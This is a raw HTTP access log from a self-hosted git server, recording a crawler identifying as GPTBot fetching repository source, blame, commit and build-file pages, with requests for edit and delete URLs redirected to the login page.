200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 22752] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14652] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11113] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" +[17/Feb/2026:17:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14173] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:36:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:36:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/main.py" +[17/Feb/2026:17:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/main.py" +[17/Feb/2026:17:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/main.py" +[17/Feb/2026:17:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/main.py" +[17/Feb/2026:17:36:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11246] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:17:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:36:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/storage.py" +[17/Feb/2026:17:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/README.md" +[17/Feb/2026:17:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 10200] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 9805] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11217] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19513] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:36:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/README.md" +[17/Feb/2026:17:36:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/README.md" +[17/Feb/2026:17:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/README.md" +[17/Feb/2026:17:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 